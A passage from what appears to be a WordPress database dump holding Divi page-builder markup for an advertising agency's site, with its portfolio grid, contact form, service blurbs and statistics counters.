custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:26:23','2020-08-07 19:26:23','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(561,1,'2020-08-07 19:39:10','2020-08-07 19:39:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" 